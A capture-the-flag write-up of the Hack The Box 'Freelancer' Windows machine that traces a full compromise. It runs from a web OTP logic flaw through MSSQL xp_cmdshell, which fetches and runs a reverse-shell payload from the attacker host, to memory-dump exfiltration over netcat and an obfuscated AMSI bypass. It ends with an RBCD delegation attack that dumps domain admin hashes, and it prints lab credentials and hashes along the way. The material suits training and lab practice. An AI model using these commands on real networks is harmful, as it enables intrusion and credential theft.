Hack The Box / WINDOWS / 2026-03-27
Hack The Box - Freelancer (Windows)
Web logic flaw leads to admin access, MSSQL xp_cmdshell gives shell, memory dump forensics leaks credentials, and RBCD path from lorra199 yields domain admin hash and final Administrator access.
Target
- IP:
10.129.244.224
Recon
sudo nmap -sC -sV 10.129.244.224 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.25.5
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-05 00:31:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
50568/tcp open msrpc Microsoft Windows RPC
50571/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-06-05T00:32:33
|_ start_date: N/A
|_clock-skew: 5h00m01s
Add freelancer.htb to /etc/hosts.
Initial Web Attack Path
Use attached script:
attachments/brute_users.py
Admin profile page:
http://freelancer.htb/accounts/profile/visit/2/
It belongs to John Halond, email:
johnHalond@freelancer.htb
Register as an employer.
At first, login with employer credentials fails. Recover the employer password, then login works.
Go to the QR code page. Decoded QR gives a link like:
http://freelancer.htb/accounts/login/otp/MTAwMTE=/4b64eacd64a2d67d01c77144d07eac51/
MTAwMTE= is Base64 for 10011 (current user id). Change it to Mg== (id 2):
http://freelancer.htb/accounts/login/otp/Mg==/8a1531291ed9584ac7c93956f8bb95e6/
We get an admin session.
Open admin panel:
http://freelancer.htb/admin/
MSSQL Hash Capture and SQL Execution
Start Responder:
sudo responder -I tun0
From SQL terminal run:
xp_dirtree '\\10.10.14.17\any\thing'
Captured hash:
sql_svc::FREELANCER:7746e2dd07eaaceb:DD9755E8912E304A1E80109FD497EB69:01010000000000000094653CA5B6DA0127221F31235524D00000000002000800450049003600340001001E00570049004E002D004B0057004A003400450033004C00350055004B004D0004003400570049004E002D004B0057004A003400450033004C00350055004B004D002E0045004900360034002E004C004F00430041004C000300140045004900360034002E004C004F00430041004C000500140045004900360034002E004C004F00430041004C00070008000094653CA5B6DA0106000400020000000800300030000000000000000000000000300000EFFE1A23917CC6E21B3DC526B2FBB1DA2F9A029BEE786CB741F1CD5173F0D4730A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003700000000000000000
Could not crack it.
Start HTTP server:
python3 -m http.server 80
Enable command execution through SQL terminal:
EXECUTE AS LOGIN = 'sa'
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC xp_cmdshell 'curl http://10.10.16.12/'
Result:
HTTP request received on attacker server.
Upload and run reverse shell script (attached file attachments/rev):
EXECUTE AS LOGIN = 'sa'
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC xp_cmdshell 'curl http://10.10.16.12/rev -o C:\Windows\Temp\rev'
EXECUTE AS LOGIN = 'sa'
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC xp_cmdshell 'python C:\Windows\Temp\rev'
Result:
Reverse shell as sql_svc.
Credential Reuse to mikasaAckerman
dir C:\Users
06/04/2024 09:28 AM <DIR> Administrator
05/28/2024 10:23 AM <DIR> lkazanof
05/28/2024 10:23 AM <DIR> lorra199
05/28/2024 10:22 AM <DIR> mikasaAckerman
08/27/2023 01:16 AM <DIR> MSSQLSERVER
05/28/2024 02:13 PM <DIR> Public
05/28/2024 10:22 AM <DIR> sqlbackupoperator
05/28/2024 11:16 AM <DIR> sql_svc
type C:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
Upload RunasCs:
https://github.com/antonioCoco/RunasCs
.\RunasCs.exe "mikasaAckerman" "IL0v3ErenY3ager" "whoami"
freelancer\mikasaackerman
Start listener:
nc -vlnp 4444
Run reverse shell as mikasaAckerman:
.\RunasCs.exe "mikasaAckerman" "IL0v3ErenY3ager" "python C:\temp\rev"
Result:
Reverse shell as mikasaAckerman.
Memory Dump Exfiltration and Secrets Extraction
Read mail note:
type Desktop\mail.txt
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,
Desktop contains MEMORY.7z.
Upload nc64.exe:
https://github.com/int0x33/nc.exe/
Attacker side:
nc -vlnp 5555 -w1 > MEMORY.7z
Victim side:
.\nc64.exe 10.10.16.12 5555 < MEMORY.7z
Extract archive and inspect MEMORY.DMP.
Use MemProcFS and plugins:
https://github.com/ufrisk/MemProcFShttps://github.com/ufrisk/MemProcFS-plugins
Copy plugin folders into MemProcFS plugins directory.
Start MemProcFS:
MemProcFS_files_and_binaries_v5.9.17-win_x64-20240603\MemProcFS.exe -device MEMORY\MEMORY.DMP
From M:\py\regsecrets\all:
============== SAM hive secrets ==============
HBoot Key: ea5f053efa118386e50003fe8d99078310101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:725180474a181356e53f4fe3dffac527:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:04fc56dd3ee3165e966ed04ea791d7a7:::
============== SECURITY hive secrets ==============
Iteration count: 10240
Secrets structure format : VISTA
LSA Key: c6a7057cad4f93923c45b26cbaaa5550ce747620c8ef8772e53dccb70f55889e
NK$LM Key: 40000000000000000000000000000000634d9d4c85ef33ffa5e14de2dca12075d220eaa9bce0db7dbe77e9be6ead47ec2602e1f6bff5c5ccf9d67a16491c43c5776de0a8c6241536bf27499619b96320fe8905909f598175c930e9b170818d39
FREELANCER.HTB/Administrator:*2023-10-04 12:55:34*$DCC2$10240#Administrator#67a0c0f193abd932b55fb8916692c361
FREELANCER.HTB/lorra199:*2023-10-04 12:29:00*$DCC2$10240#lorra199#7ce808b78e75a5747135cf53dc6ac3b1
FREELANCER.HTB/liza.kazanof:*2023-10-04 17:31:23*$DCC2$10240#liza.kazanof#ecd6e532224ccad2abcf2369ccb8b679
=== LSA Machine account password ===
History: False
NT: 1003ddfa0a470017188b719e1eaae709
Password(hex): a680a4af30e045066419c6f52c073d738241fa9d1cff591b951535cff5320b109e65220c1c9e4fa891c9d1ee22e990c4766b3eb63fb3e2da67ebd19830d45c0ba4e6e6df93180c0a7449750655edd78eb848f757689a6889f3f8f7f6cf53e1196a528a7cd105a2eccefb2a17ae5aebf84902e3266bbc5db6e371627bb0828c2a364cb01119cf3d2c70d920328c814cad07f2b516143d86d0e88ef1504067815ed70e9ccb861f57394d94ba9f77198e9d76ecadf8cdb1afda48b81f81d84ac62530389cb64d412b784f0f733551a62ec0862ac2fb261b43d79990d4e2bfbf4d7d4eeb90ccd7dc9b482028c2143c5a6010
Kerberos password(hex): e882a6eabea4ee80b0d985e1a5a4ef9786dcace78cbde48682e9b7baefbc9ce1ad99e19695ecbcb5e38bb5e1808be6969ee0b0a2e9b89ceaa18feca691eebb91eea4a2ec9290e6adb6eb98beeb8cbfefbfbdeeada7e9a391ed90b0e0ad9cee9aa4efbfbde1a293e0a88ce4a5b4d9b5eeb595e8bb97e4a2b8e59fb7e9a9a8e8a5a8efa3b3ef9bb7e58f8fe1a7a1e589aae7b28ad791eeb2a2efaf8ee19caae5aaaeefa3abc989e29ba3ebb1abeb999de787a3e7ada2e88ab0e2aa8ce4b0b6e186b0ecbc99e2b0bdefbfbde388a0e8868ceab58cef8887e19ab5e3b494ed8286e8bba8e583b1e69d80e5ba81e0bb97ecae9ce1be86e3a597e9918de9bebae1a5b7e9b68eeeb1b6efa2adeb878defbfbdeba188e8849fe4ab98e29786e3a0b0eb9a9ce4858de7a0abe0bd8fe395b3ea9991ec80aee2aa86efaf82e1aca6ed9d83e98299ee8b94ebbebfe7b58deead8eecb290efbfbde4a29be2a0a0e19382e5a8bce181a0
=== LSA Machine account password ===
History: True
NT: 4e7857719aec1e3f13e79f28f68bb95d
Password(hex): 3300740032004300770065003b0038004b00780021003a0062002c0072003d0034002300280024007a002a006a006900450049005000220031003000600063002d0049002500680060004000280029002300560077004f0027006e005d0042006c007300510043003a00230055005100410048004b006e003b0024003900430030004000200047007400420049003300430048005f0036006200740024003b002000750052002500530067006500420066004d004d00600076005a0030004000740038005b003300460067004400620058006f0051005e004c0036005a00370072004200780038003900200078003a00
Kerberos password(hex): 3374324377653b384b78213a622c723d342328247a2a6a6945495022313060632d492568604028292356774f276e5d426c7351433a23555141484b6e3b243943304020477442493343485f366274243b2075522553676542664d4d60765a304074385b3346674462586f515e4c365a37724278383920783a
=== LSA DPAPI secret ===
History: False
Machine key (hex): cf1bc407d272ade7e781f17f6f3a3fc2b82d16bc
User key(hex): 6d210ab98889fac8829a1526a5d6a2f76f8f9d53
=== LSA DPAPI secret ===
History: True
Machine key (hex): ee8c9b3c041dc01afb54b421d4fafa0bbd314c1c
User key(hex): a3a744a52e541603869eef3ee06191dd8597db83
=== LSASecret NL$KM ===
History: False
Secret:
00000000: 63 4d 9d 4c 85 ef 33 ff a5 e1 4d e2 dc a1 20 75 |cM.L..3...M... u|
00000010: d2 20 ea a9 bc e0 db 7d be 77 e9 be 6e ad 47 ec |. .....}.w..n.G.|
00000020: 26 02 e1 f6 bf f5 c5 cc f9 d6 7a 16 49 1c 43 c5 |&.........z.I.C.|
00000030: 77 6d e0 a8 c6 24 15 36 bf 27 49 96 19 b9 63 20 |wm...$.6.'I...c |
=== LSASecret NL$KM ===
History: True
Secret:
00000000: 63 4d 9d 4c 85 ef 33 ff a5 e1 4d e2 dc a1 20 75 |cM.L..3...M... u|
00000010: d2 20 ea a9 bc e0 db 7d be 77 e9 be 6e ad 47 ec |. .....}.w..n.G.|
00000020: 26 02 e1 f6 bf f5 c5 cc f9 d6 7a 16 49 1c 43 c5 |&.........z.I.C.|
00000030: 77 6d e0 a8 c6 24 15 36 bf 27 49 96 19 b9 63 20 |wm...$.6.'I...c |
=== LSA Service User Secret ===
History: False
Service name: _SC_MSSQL$DATA
Username: UNKNOWN
00000000: 50 57 4e 33 44 23 6c 30 72 72 40 41 72 6d 65 73 |PWN3D#l0rr@Armes|
00000010: 73 61 31 39 39 |sa199|
=== LSA Service User Secret ===
History: True
Service name: _SC_MSSQL$DATA
Username: UNKNOWN
00000000: 4d 53 53 51 4c 53 33 72 76 33 72 50 40 73 73 77 |MSSQLS3rv3rP@ssw|
00000010: 64 23 30 39 |d#09|
============== SOFTWARE hive secrets ==============
default_logon_user:
Use recovered service password with RunasCs:
.\RunasCs.exe "lorra199" "PWN3D#l0rr@Armessa199" "whoami"
freelancer\lorra199
Connect with Evil-WinRM:
evil-winrm -i 10.129.151.151 -u 'lorra199' -p 'PWN3D#l0rr@Armessa199'
AD Privilege Escalation (RBCD)
Collect BloodHound data:
bloodhound-python -u 'lorra199' -p 'PWN3D#l0rr@Armessa199' -ns 10.129.151.151 -d 'freelancer.htb' -dc 'dc.freelancer.htb' -c All
Finding:
lorra199is inAD Recycle Bin, which hasGenericWriteondc.freelancer.htb.
Many scripts are blocked by AV.
Reference:
https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/
AMSI bypass used:
$w = 'System.Management.Automation.A';$c = 'si';$m = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $w,$c,$m))
$field = $assembly.GetField(('am{0}InitFailed' -f $c),'NonPublic,Static')
$field.SetValue($null,$true)
Load PowerView:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
. .\PowerView.ps1
Load Powermad:
https://github.com/Kevin-Robertson/Powermad
. .\Powermad.ps1
Create computer account:
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
Get SID:
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
Alternative:
get-adcomputer attackersystem -prop sid
Set RBCD ACL:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
$targetComputer = "dc.freelancer.htb"
Get-DomainComputer $targetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Alternative write with Impacket:
impacket-rbcd -delegate-from 'attackersystem$' -delegate-to 'DC$' -action write -dc-ip 10.129.244.224 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'
Request service ticket:
sudo ntpdate 10.129.244.224; impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrator' 'freelancer.htb/attackersystem$:Summer2018!'
Set cache:
export KRB5CCNAME=`pwd`/Administrator.ccache
Dump Administrator secrets:
sudo ntpdate 10.129.244.224; impacket-secretsdump -k -no-pass -just-dc-user Administrator dc.freelancer.htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:1743fa93ed1f2f505d3c7cd6ef1e8c40589f107070065e98efc89ea907d81601
Administrator:aes128-cts-hmac-sha1-96:bd23b1924f1fd0bdc60abf464114a867
Administrator:des-cbc-md5:0d400dfe572a3262
Final shell:
evil-winrm -i 10.129.244.224 -u 'Administrator' -H '0039318f1e8274633445bce32ad1a290'